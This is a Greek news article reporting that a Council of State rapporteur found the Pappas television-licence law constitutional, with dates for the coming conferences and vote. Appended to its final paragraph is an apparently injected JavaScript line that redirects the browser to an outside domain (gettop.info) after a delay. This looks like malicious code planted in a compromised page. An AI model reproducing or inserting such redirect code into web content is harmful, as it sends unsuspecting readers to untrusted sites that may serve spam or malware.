Εισηγητής ΣτΕ: Συνταγματικός ο νόμος Παππά για τις άδειες

0
6

 

Τη Δευτέρα 24 Οκτωβρίου και την Τετάρτη 26 Οκτωβρίου αναμένεται να πραγματοποιηθούν οι νέες διασκέψεις του Συμβουλίoυ της Εpικρατείας, προκειμένου να μπουν στην ουσία της υπόθεσης.

Στο μεταξύ στη χθεσινή διάσκεψη, ο εισηγητής της υπόθεσης Γιώργος Παπαγεωργίου τάχθηκε υπέρ της συνταγματικότητας του Νόμου Παππά για τις τηλεοπτικές άδειες αλλά και υπέρ της νομιμότητας των υπουργικών και άλλων αποφάσεων που εκδόθηκαν σε επιταγή του εν λόγω νόμου.

Μετά την απόφαση των δικαστών με 16 έναντι 9 που έκριναν νόμιμες και παραδεκτές τις προσφυγές των τηλεοπτικών σταθμών, η διάσκεψη μπήκε στην ουσία της υπόθεσης ξεκινώντας με την εισήγηση του κ. Παπαγεωργίου.

Εφόσον στην επομένη διάσκεψη ολοκληρώσει ο κ. Παπαγεωργίου, θα λάβουν τον λόγο οι αντιπρόεδροι και οι σύμβουλοι Επικρατείας προκειμένου να αναπτύξουν τις δικές τους απόψεις επί του θέματος.

Εκτός απροόπτου η ψηφοφορία για τη συνταγματικότητα του νόμου αναμένεται να πραγματοποιηθεί στη διάσκεψη της Τετάρτης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here